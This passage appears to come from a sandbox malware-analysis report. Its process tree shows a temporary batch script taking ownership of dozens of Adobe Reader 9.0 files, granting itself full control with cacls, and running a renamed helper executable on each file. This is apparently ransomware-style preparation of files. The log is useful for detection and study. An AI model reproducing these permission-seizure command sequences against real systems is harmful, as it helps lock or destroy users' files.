  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
    3⤵
    - Modifies file permissions
    PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "form_responses.gif" -nobanner
    3⤵
    PID:1952
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "form_responses.gif" -nobanner
      4⤵
      PID:1032
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:1552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "review_email.gif" -nobanner
    3⤵
    PID:1108
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "review_email.gif" -nobanner
      4⤵
      PID:1360
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    PID:304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:1472
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "tr.gif" -nobanner
      4⤵
      PID:384
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""
  2⤵
  PID:1332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"
    3⤵
    PID:948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "AdobePiStd.otf" -nobanner
    3⤵
    PID:788
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "AdobePiStd.otf" -nobanner
      4⤵
      PID:1796
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:1408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:1552
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
      4⤵
      PID:1528
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:1416
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    - Modifies file permissions
    PID:820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:1000
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
      4⤵
      PID:1508
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:1568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    PID:1032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:1256
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "can.fca" -nobanner
      4⤵
      PID:1044
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""
  2⤵
  PID:1628
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "usa03.ths" -nobanner
    3⤵
    PID:752
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "usa03.ths" -nobanner
      4⤵
      PID:1844
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
    3⤵
    PID:112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
    3⤵
    - Modifies file permissions
    PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "GREEK.TXT" -nobanner
    3⤵
    PID:1416
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "GREEK.TXT" -nobanner
      4⤵
      PID:1060
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:1268
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
    3⤵
    PID:684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
    3⤵
    PID:1316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CP1253.TXT" -nobanner
    3⤵
    PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:1528
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  PID:1384
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    3⤵
    PID:752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    3⤵
    - Modifies file permissions
    PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "RTC.der" -nobanner
    3⤵
    PID:1824
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "RTC.der" -nobanner
      4⤵
      PID:1836
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "end_review.gif" -nobanner
    3⤵
    PID:1000
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "end_review.gif" -nobanner
      4⤵
      PID:1916
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""
  2⤵
  PID:1316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
    3⤵
    PID:320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"
    3⤵
    - Modifies file permissions
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "reviews_joined.gif" -nobanner
    3⤵
    PID:1268
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "reviews_joined.gif" -nobanner
      4⤵
      PID:1108
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    3⤵
    PID:592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "server_ok.gif" -nobanner
    3⤵
    PID:1844
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "server_ok.gif" -nobanner
      4⤵
      PID:1936
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  PID:1880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    3⤵
    PID:364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "warning.gif" -nobanner
    3⤵
    PID:384
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "warning.gif" -nobanner
      4⤵
      PID:1292
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"
    3⤵
    - Modifies file permissions
    PID:324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
    3⤵
    PID:1316
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
      4⤵
      PID:1816
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1824
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""
  2⤵
  PID:1384
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"
    3⤵
    PID:1032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "SY______.PFB" -nobanner
    3⤵
    PID:1480
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "SY______.PFB" -nobanner
      4⤵
      PID:1508
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""
  2⤵
  PID:1004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C
    3⤵
    PID:384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"
    3⤵
    PID:320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "brt.hyp" -nobanner
    3⤵
    PID:472
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "brt.hyp" -nobanner
      4⤵
      PID:1492
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""
  2⤵
  PID:1552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C
    3⤵
    PID:1316
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "eng32.clx" -nobanner
    3⤵
    PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "eng32.clx" -nobanner
      4⤵
      PID:820
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""
  2⤵
  PID:1796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
    3⤵
    PID:684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CENTEURO.TXT" -nobanner
    3⤵
    PID:1384
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CENTEURO.TXT" -nobanner
      4⤵
      PID:1432
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""
  2⤵
  PID:1932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C
    3⤵
    PID:752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"
    3⤵
    - Modifies file permissions
    PID:1232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "UKRAINE.TXT" -nobanner
    3⤵
    PID:1004
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "UKRAINE.TXT" -nobanner
      4⤵
      PID:112
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
  2⤵
  PID:1256
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
    3⤵
    PID:1416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "distribute_form.gif" -nobanner
    3⤵
    PID:1844
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "distribute_form.gif" -nobanner
      4⤵
      PID:820
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
    3⤵
    PID:1952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
    3⤵
    - Modifies file permissions
    PID:944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "main.css" -nobanner
    3⤵
    PID:1240
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "main.css" -nobanner
      4⤵
      PID:1384
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
  2⤵
  PID:908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
    3⤵
    - Modifies file permissions
    PID:1572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "review_shared.gif" -nobanner
    3⤵
    PID:2024
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "review_shared.gif" -nobanner
      4⤵
      PID:1268
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""
  2⤵
  PID:472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:1392
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:1888
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""
  2⤵
  PID:952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"
    3⤵
    - Modifies file permissions
    PID:1056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
    3⤵
    PID:1916
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
      4⤵
      PID:1568
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:304
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""
  2⤵
  PID:1812
